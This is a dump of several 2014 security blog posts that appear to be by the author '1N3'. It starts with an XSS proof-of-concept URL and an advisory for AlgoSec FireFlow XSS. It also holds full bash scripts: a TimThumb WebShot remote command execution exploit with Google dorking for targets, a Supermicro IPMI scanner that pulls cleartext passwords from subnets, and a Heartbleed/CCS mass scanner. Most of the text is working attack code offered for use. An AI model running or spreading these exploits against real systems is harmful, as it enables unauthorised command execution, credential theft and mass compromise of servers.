http://scrubbedhost.com/test.php?testtype=1"><script>alert(1);</script>&codebase=myspeed.pathcom.com&location=Canada:%20Toronto,%20ON&ver=1"><script>alert(1);</script>&cm=1"><script>alert(1);</script>&map=1"><script>alert(1);</script>&lines=1"><script>alert(1);</script>&pps=1"><script>alert(1);</script>&bpp=1"><script>alert(1);</script>&codec=1"><script>alert(1);</script>&provtext=1"><script>alert(1);</script>&provtextextra=11"><script>alert(1);</script>&provlink=1"><script>alert(1);</script><br />
<br />
<br />
VULNERABLE CODE:<br />
<br />
* Both voiplines and testlength are written into the page without being properly sanitized and are thus vulnerable to reflective XSS. <br />
<br />
<td valign="top" width="30%"><b>Current<br />
Settings</b><br />
<br><br />
<br><br />
<b>VoIP Lines Simulated</b>:<br />
<script type="text/javascript"> document.write(voiplines); </script><br><br />
<b>Test Length</b>:<br />
<script type="text/javascript"> document.write(testlength); </script><br><br />
<b>Codec</b>:<br />
<script type="text/javascript"> if (codec == "g711") { document.write(nameg711); }<br />
else { document.write(nameg729); }<br />
</script><br><br />
</td><br />
<td align="left" width="70%"><br />
<p align="center"><br />
<script><br />
<br />
<br />Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-46863054024166693952014-06-27T05:06:00.000-07:002014-06-27T06:22:17.561-07:00TimThumb WebShot Code Execution Exploit (0-day)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMOqITyTSTSukHr4MHlXGa711Ph0lnERi2ImrP5dJmq42OsxuWXVdn1N1Km-HtSD4-Hnf2Yn15jXr6xfiPtCC5OV-3WjQ2vzxxx6BLGr8KtGqyTV7TlxNeSLZVmzInkwds-1cedto8m3rN/s1600/wordpress-shortcode.jpg" imageanchor="1" imqq134697747865297241839497637511="true" style="margin-left: 1em; margin-right: 1em;" zmwifs738411679060974503591734517818="true"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMOqITyTSTSukHr4MHlXGa711Ph0lnERi2ImrP5dJmq42OsxuWXVdn1N1Km-HtSD4-Hnf2Yn15jXr6xfiPtCC5OV-3WjQ2vzxxx6BLGr8KtGqyTV7TlxNeSLZVmzInkwds-1cedto8m3rN/s1600/wordpress-shortcode.jpg" height="223" width="400" /></a></div>
<br />
<br />
#!/bin/bash<br /># Wordpress TimThumb Remote Command Execution Exploit (0day) v20140627 by 1N3<br /># (c) http://treadstonesecurity.blogspot.ca<br /># Usage: sh timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]<br />#<br /># ABOUT:<br /># TimThumb’s “Webshot” feature that allows for certain commands to be executed on the <br /># vulnerable website remotely (no authentication required). With a simple command, an <br /># attacker can create, remove and modify any files on your server. Timthumb 2.8.11-2.8.13<br /># with the WEBSHOT_ENABLED option enabled appear to be vulnerable. <br />#<br /># USAGE: <br /># ./timthumb_0day.sh <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]<br />#<br /># NOTE: proxy and command fields are optional. <br />#<br /># EXAMPLE:<br /># ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php<br /># ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php none rm$IFS/tmp/a.txt<br /># ./timthumb_0day.sh domain.com /wp-content/plugins/timthumb/timthumb.php proxy 'rm$IFS/tmp/a.txt'<br /><br /># BANNER<br />clear<br />echo "(--==== http://treadstonesecurity.blogspot.ca"<br />echo "(--==== Wordpress TimThumb Remote Command Execution Exploit (0day) by 1N3"<br />echo ""<br /><br /># VARS<br />UNICORNSCAN=`which unicornscan`<br />CURL=`which curl`<br />PROXYCHAINS=`which proxychains`<br />TARGET=$1<br />BASE_PATH=$2<br />PROXY=$3<br />COMMAND=$4<br /><br /># REQUIREMENTS<br />if [ "$PROXYCHAINS" == "" ]; then<br /> echo "(--==== Proxychains not installed! Continuing scan without proxy support..."<br /> exit<br />fi<br /><br />if [ "$CURL" == "" ]; then<br /> echo "(--==== Curl not installed! 
Exiting..."<br /> exit<br />fi<br /><br />if [ -z "$TARGET" ] || [ -z "$BASE_PATH" ]; then<br /> echo "(--==== Usage: $0 <IP|domain.com|google> </path/to/timthumb.php> [proxy] [command]"<br /> exit<br />fi<br /><br />if [ $TARGET == "google" ]; then<br /># USE GOOGLE HACKING TO FIND VULNERABLE SERVERS<br /> echo "Searching Google..."<br /> iceweasel 'https://www.google.com/search?q=TimThumb+version+%3A+2.8.13&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=iceweasel-a#q=inurl:%27%2Ftimthumb.php%27+filetype:php+inurl:plugins+inurl:wp-content&rls=org.mozilla:en-US:unofficial' &<br /> exit<br />fi<br /><br />if [ "$PROXY" = "proxy" ]; then<br />#PROXY ENABLED<br /> echo "(--==== Scanning via proxy..."<br /><br /> if [ -z $COMMAND ]; then<br /> # RUN DEFAULT COMMAND (ie. touch /tmp/a.txt)<br /> echo "(--==== Sending exploit request to: "$TARGET<br /> echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'<br /> proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version<br /> echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."<br /> else<br /> # RUN CUSTOM COMMAND<br /> echo "(--==== Sending exploit request to: "$TARGET<br /> echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'<br /> proxychains curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version<br /> echo "(--==== Exploit Sent!"<br /> fi<br /> exit<br /><br />else <br /># NO PROXY<br /> echo "(--==== Scanning via direct connection..."<br /><br /> if [ -z $COMMAND ]; then<br /> # RUN DEFAULT COMMAND (ie. 
touch /tmp/a.txt)<br /> echo "(--==== Sending exploit request to: "$TARGET<br /> echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)'<br /> curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$(touch$IFS/tmp/a.txt)' | grep version<br /> echo "(--==== Exploit Sent! Check the local system for /tmp/a.txt..."<br /> else<br /> # RUN CUSTOM COMMAND<br /> echo "(--==== Sending exploit request to: "$TARGET<br /> echo '(--==== GET http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')'<br /> curl 'http://'$TARGET$BASE_PATH'?webshot=1&src=http://'$TARGET'/$('$COMMAND')' | grep version<br /> echo "(--==== Exploit Sent!"<br /> fi<br /> exit<br />fi<br /><br />echo ""<br />echo "(--==== Scan Complete!"<br />exit Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-3352537640011430393.post-29523386465648247382014-06-21T16:29:00.003-07:002014-06-24T17:16:47.259-07:00Supermicro IPMI/BMC Cleartext Password Scanner<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirofaHyXncIFESrF7DC_dwf1u5mclN-MfAAy8RjmaiCU2nSqunkE8OFZb0e0byIc9Z2Q61ih2QLTCwwOzvs7zKdLcII74dL56aR6TArjmKXqLxsevbPBBHASPfKEaEHHKsuMYEPIEAbhFS/s1600/supermicro.png" huzso16469418165383905990821860839="true" imageanchor="1" style="margin-left: 1em; margin-right: 1em;" wkddl150497890723361269479803976080="true" zeacktj322810314364297069701741737613="true"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirofaHyXncIFESrF7DC_dwf1u5mclN-MfAAy8RjmaiCU2nSqunkE8OFZb0e0byIc9Z2Q61ih2QLTCwwOzvs7zKdLcII74dL56aR6TArjmKXqLxsevbPBBHASPfKEaEHHKsuMYEPIEAbhFS/s1600/supermicro.png" height="306" width="400" /></a></div>
<br />
#!/bin/bash<br />
# Supermicro IPMI/BMC Cleartext Password Scanner v20140622 by 1N3<br />
# http://treadstonesecurity.blogspot.ca<br />
# Usage: sh supermicro_scan.sh <CIDR|IP|shodan> [proxy]<br />
#<br />
# ABOUT:<br />
# Supermicro's implementation of IPMI/BMC allows remote, unauthenticated attackers to<br />
# request the file PSBlock via port 49152. This plain text password file contains IPMI<br />
# username and password information. This script allows users to scan their networks and<br />
# check for vulnerable systems that require patching.<br />
#<br />
# USAGE:<br />
# ./supermicro_scan.sh 74.200.8.237 - Single host scan<br />
# ./supermicro_scan.sh 74.200.0.0/16 proxy - Subnet scan with proxy<br />
# ./supermicro_scan.sh shodan - Open a Shodan search for potentially affected servers in the browser<br />
#<br />
# HOW IT WORKS: unicornscan finds hosts with TCP 49152 open, then one HTTP GET for /PSBlock is<br />
# sent to each and the response is run through 'strings'. Anything the file contains --<br />
# including credentials -- is printed unredacted to the terminal, so treat the output as sensitive.<br />
<br />
clear<br />
echo "(--==== http://treadstonesecurity.blogspot.ca"<br />
echo "(--==== Supermicro IPMI Cleartext Password Scanner by 1N3"<br />
echo ""<br />
<br />
UNICORNSCAN=`which unicornscan`<br />
CURL=`which curl`<br />
PROXYCHAINS=`which proxychains`<br />
TARGET=$1<br />
PROXY=$2<br />
<br />
if [ "$UNICORNSCAN" == "" ]; then<br />
echo "(--==== Unicornscan not installed! Exiting..."<br />
exit<br />
fi<br />
<br />
# NOTE(review): the message says the scan continues without proxy support, but the script<br />
# exits here -- proxychains is effectively required even for direct scans.<br />
if [ "$PROXYCHAINS" == "" ]; then<br />
echo "(--==== Proxychains not installed! Continuing scan without proxy support..."<br />
exit<br />
fi<br />
<br />
if [ "$CURL" == "" ]; then<br />
echo "(--==== Curl not installed! Exiting..."<br />
exit<br />
fi<br />
<br />
# Argument check runs after the tool checks, so a missing tool is reported before a missing target.<br />
if [ -z "$1" ]; then<br />
echo "(--==== Usage: $0 <CIDR|IP> [proxy]"<br />
exit<br />
fi<br />
<br />
# Browser-only lookup: opens a Shodan query in iceweasel and exits without scanning anything.<br />
if [ $TARGET == "shodan" ]; then<br />
# SCAN USING SHODANHQ SEARCH<br />
echo "Searching ShowdanHQ..."<br />
iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &<br />
exit<br />
fi<br />
<br />
# The two branches below are identical except that the proxy branch prefixes curl with proxychains.<br />
# Field 5 of the unicornscan output is assumed to hold the host address -- TODO confirm against<br />
# the installed version's output format (unicornscan's stderr is discarded).<br />
if [ "$PROXY" = "proxy" ]; then<br />
#PROXY ENABLED<br />
echo "(--==== Scanning via proxy..."<br />
# SCAN FOR THE DEFAULT FILES AND PORTS<br />
for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do <br />
echo "(--==== Extracting User/Pass from $a"<br />
echo "(--==== Sending GET http://$a:49152/PSBlock"<br />
# curl: -m 3 = 3 s overall timeout, --retry 1, -f = fail silently on HTTP errors, -# = progress bar<br />
proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings<br />
done<br />
exit<br />
<br />
else <br />
# NO PROXY<br />
echo "(--==== Scanning via direct connection..."<br />
# SCAN FOR THE DEFAULT FILES AND PORTS<br />
for a in `unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}'`; do <br />
echo "(--==== Extracting User/Pass from $a"<br />
echo "(--==== Sending GET http://$a:49152/PSBlock"<br />
curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings<br />
done<br />
exit<br />
<br />
fi<br />
<br />
# Unreachable: both branches above exit before control reaches here.<br />
echo ""<br />
echo "(--==== Scan Complete!"<br />
exit Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-68129954009361978062014-06-09T09:13:00.002-07:002014-06-24T17:17:26.369-07:00AlogoSec FireFlow v6.3 XSS/HTML Injection Flaws<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Arial,Helvetica,sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2yc2YAHoUYDFUGr3SjRLl9L0aZBLc6tkraXeB8f0uIxTqKh2GJ4hZqEgLKKqbi4IzOXxLFbFqbqs0jDi8v0h1aRUcjK2uQFzpTJwGKuowyET7vSjsgYVApcnKCTthkVuPGLFR6V6xTEoR/s1600/FireFlowXSS2c.png" huzso16469418165383905990821860839="true" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2yc2YAHoUYDFUGr3SjRLl9L0aZBLc6tkraXeB8f0uIxTqKh2GJ4hZqEgLKKqbi4IzOXxLFbFqbqs0jDi8v0h1aRUcjK2uQFzpTJwGKuowyET7vSjsgYVApcnKCTthkVuPGLFR6V6xTEoR/s1600/FireFlowXSS2c.png" height="193" width="400" /></a></span></div>
<div dir="ltr" id="docs-internal-guid-4cd16b05-8165-1aaa-f73a-df61899e620e" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial,Helvetica,sans-serif;"><br /></span></div>
x---==== Exploit Title: AlgoSec FireFlow v6.3 XSS/HTML Injection Flaws<br />
x---==== Date: Mon Jun 9 2014<br />
x---==== Author: 1N3<br />
x---==== Homepage: <a href="http://treadstonesecurity.blogspot.ca/" huzso16469418165383905990821860839="true">http://treadstonesecurity.blogspot.ca</a><br />
x---==== Software Link: <a href="http://www.algosec.com/en/products_solutions/products/fireflow" huzso16469418165383905990821860839="true">http://www.algosec.com/en/products_solutions/products/fireflow</a> <br />
x---==== Version: 6.3 (Other versions may also be susceptible)<br />
<br />
x---==== Vulnerability<br />
Form fields in the user preferences screen in AlgoSec FireFlow v6.3-b230 are vulnerable to reflected XSS and HTML injection attacks. This may allow attackers to execute arbitrary JavaScript in the browser sessions of other logged-in users of the system by placing XSS payloads in their signature field. <br />
<br />
x---==== Vulnerable URL: <br />
<a href="https://fireflowhostname.com/FireFlow/SelfService/Prefs.html" huzso16469418165383905990821860839="true">https://fireflowhostname.com/FireFlow/SelfService/Prefs.html</a><br />
<br />
x---==== XSS Code: <br />
<script>alert(document.cookie)</script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3352537640011430393.post-51152552845891561182014-06-06T12:53:00.001-07:002014-06-24T17:18:02.116-07:00OpenSSL CCS & HeartBleed Mass Scanner<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp8GgqswHUrqtk2LitgSUmxQGa9rTIHuhdWzuFS3LjiMEECNWj3DfCLZEk0lM1VPqTtwPDj1C-B8g1pnV0tWS3y9SPZla3M82WDos6hALchyphenhyphenFZ4ccrwFeX_zvwq8vUNAiSPt1sYxy1FlYw/s1600/openssl.jpg" huzso16469418165383905990821860839="true" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp8GgqswHUrqtk2LitgSUmxQGa9rTIHuhdWzuFS3LjiMEECNWj3DfCLZEk0lM1VPqTtwPDj1C-B8g1pnV0tWS3y9SPZla3M82WDos6hALchyphenhyphenFZ4ccrwFeX_zvwq8vUNAiSPt1sYxy1FlYw/s1600/openssl.jpg" /></a></div>
<br />
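#!/bin/bash
# MassBleed OpenSSL Scanner v20140609 by 1N3
# http://treadstonesecurity.blogspot.ca
# Usage: ./massbleed.sh <CIDR|IP|PREFIX.> [single|port|subnet] [port] [proxy]
#
# ABOUT:
# This script has four main functions with the ability to proxy all connections:
# 1. Mass scan any CIDR range for OpenSSL vulnerabilities via port 443/tcp (https) (example: ./massbleed.sh 192.168.0.0/16)
# 2. Scan any CIDR range for OpenSSL vulnerabilities via any custom port specified (example: ./massbleed.sh 192.168.0.0/16 port 8443)
# 3. Scan every open port (1-65000) on a single system, or just one custom port, for vulnerable versions of OpenSSL (example: ./massbleed.sh 127.0.0.1 single [port])
# 4. Scan every open port on every host in a single class C subnet for OpenSSL vulnerabilities (example: ./massbleed.sh 192.168.0. subnet)
#    For 'subnet' the first argument is the three-octet prefix INCLUDING the trailing dot.
#
# PROXY: A proxy option has been added to scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.
# Pass 0 for any unused positional argument so that 'proxy' lands in the fourth position.
#
# PROXY USAGE EXAMPLES:
# (example: ./massbleed.sh 192.168.0.0/16 0 0 proxy)
# (example: ./massbleed.sh 192.168.0.0/16 port 8443 proxy)
# (example: ./massbleed.sh 127.0.0.1 single 0 proxy)
# (example: ./massbleed.sh 192.168.0. subnet 0 proxy)
#
# VULNERABILITIES:
# 1. OpenSSL HeartBleed Vulnerability (CVE-2014-0160)
# 2. OpenSSL CCS (MITM) Vulnerability (CVE-2014-0224)
#
# REQUIREMENTS:
# heartbleed.py (Jared Stafford's POC) and openssl_ccs.pl (Red Hat's CCS injection test) in
# the current directory, unicornscan on the PATH, and proxychains when 'proxy' is used.
# (nmap used to be a hard requirement but the script never invokes it, so it is no longer checked.)
#
# NOTE: the Heartbleed check is not passive -- a vulnerable server answers the POC with a
# slice of its process memory. Only run this against systems you are authorised to test.
#
# NOTE: the result filters are a bare 'grep vulnerable' / 'grep affected'; any "not
# vulnerable" / "not affected" line the POCs print would match them too, so read the whole
# line rather than counting hits.

echo "(--==== http://treadstonesecurity.blogspot.ca"
echo "(--==== MassBleed OpenSSL Scanner by 1N3"
echo ""

HEARTBLEED="heartbleed.py"
OPENSSL_CCS="openssl_ccs.pl"
RANGE="$1"
SCAN_TYPE="$2"
CUSTOM_PORT="$3"
PROXY="$4"
PORT_RANGE="1-65000"   # ports swept in 'single' mode when no custom port is given
DEFAULT_PORT=443       # port used when no scan type / custom port is given

if [ -z "$RANGE" ]; then
  echo "(--==== Usage: $0 <CIDR|IP|PREFIX.> [single|port|subnet] [port] [proxy]"
  exit 1
fi

if [ ! -f "$HEARTBLEED" ]; then
  echo "(--==== heartbleed.py not found!"
  echo "(--==== To fix, download the POC by Jared Stafford (https://gist.github.com/sh1n0b1/10100394) and place in same directory named: heartbleed.py"
  exit 1
fi

if [ ! -f "$OPENSSL_CCS" ]; then
  echo "(--==== openssl_ccs.pl not found!"
  echo "(--==== To fix, download the script from RedHat (https://access.redhat.com/labs/ccsinjectiontest/) and place in same directory named: openssl_ccs.pl"
  exit 1
fi

if [ -z "$(which unicornscan)" ]; then
  echo "(--==== Unicornscan not installed! Exiting..."
  exit 1
fi

# RUNNER is prefixed to every unicornscan / POC invocation. The original duplicated every
# scan mode once with "proxychains" and once without; a single prefix keeps both paths
# identical. A requested proxy that cannot be honoured is a hard stop -- falling back to a
# direct connection would leak the operator's source address.
RUNNER=""
if [ "$PROXY" = "proxy" ]; then
  if [ -z "$(which proxychains)" ]; then
    echo "(--==== Proxychains not installed but 'proxy' was requested! Exiting..."
    exit 1
  fi
  RUNNER="proxychains"
  echo "(--==== Scanning via proxy..."
else
  echo "(--==== Scanning via direct connection..."
fi

# Pull host addresses out of unicornscan's open-port lines (the ones carrying the
# "service[port]" bracket). A regex is used instead of a fixed awk column because the
# column index shifts with the width of the service-name field.
hosts_from_scan() {
  grep '\]' | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}'
}

# Pull the port number out of the "service[port]" column regardless of how the number is
# padded inside the brackets (the previous "$4 | cut -d']'" only worked for padded ports).
ports_from_scan() {
  sed -n 's/.*\[ *\([0-9][0-9]*\)\].*/\1/p'
}

# Run both OpenSSL checks against one host:port, through proxychains when requested.
check_host() {
  local host="$1"
  local port="$2"
  echo "(--==== Checking HeartBleed: $host:$port" && $RUNNER python "$HEARTBLEED" "$host" -p "$port" | grep vulnerable
  # Bug fix: the proxied subnet path previously ran "perl heartbleed.py" here.
  echo "(--==== Checking OpenSSL CCS: $host:$port" && $RUNNER perl "$OPENSSL_CCS" "$host" "$port" | grep affected
}

# Bug fix: the original tested 'port' with a plain if/else, so 'single' and 'subnet' runs
# fell through into the default 443 CIDR sweep as well. A case statement makes the modes
# mutually exclusive. An empty or "0" custom port means "not given" on every path (the
# proxied 'single' path used to run heartbleed.py with "-p ''").
case "$SCAN_TYPE" in
  single)
    if [ -n "$CUSTOM_PORT" ] && [ "$CUSTOM_PORT" != "0" ]; then
      check_host "$RANGE" "$CUSTOM_PORT"
    else
      for port in $($RUNNER unicornscan "$RANGE" -p "$PORT_RANGE" | ports_from_scan); do
        check_host "$RANGE" "$port"
      done
    fi
    ;;
  subnet)
    case "$RANGE" in
      *.) ;;
      *)
        echo "(--==== 'subnet' expects a three-octet prefix ending in a dot, e.g. 192.168.0."
        exit 1
        ;;
    esac
    for octet in {1..254}; do
      host="$RANGE$octet"
      echo "(--==== Scanning: $host"
      for port in $($RUNNER unicornscan "$host" -mT -r500 | ports_from_scan); do
        echo "(--==== $host:$port"
        check_host "$host" "$port"
      done
    done
    ;;
  port)
    if [ -z "$CUSTOM_PORT" ] || [ "$CUSTOM_PORT" = "0" ]; then
      echo "(--==== 'port' mode needs a port number as the third argument"
      exit 1
    fi
    for host in $($RUNNER unicornscan "$RANGE" -p "$CUSTOM_PORT" | hosts_from_scan); do
      check_host "$host" "$CUSTOM_PORT"
    done
    ;;
  *)
    # Default: sweep the CIDR range on 443/tcp.
    for host in $($RUNNER unicornscan "$RANGE" -p "$DEFAULT_PORT" | hosts_from_scan); do
      check_host "$host" "$DEFAULT_PORT"
    done
    ;;
esac

echo "(--==== Scan Complete!"
exit 0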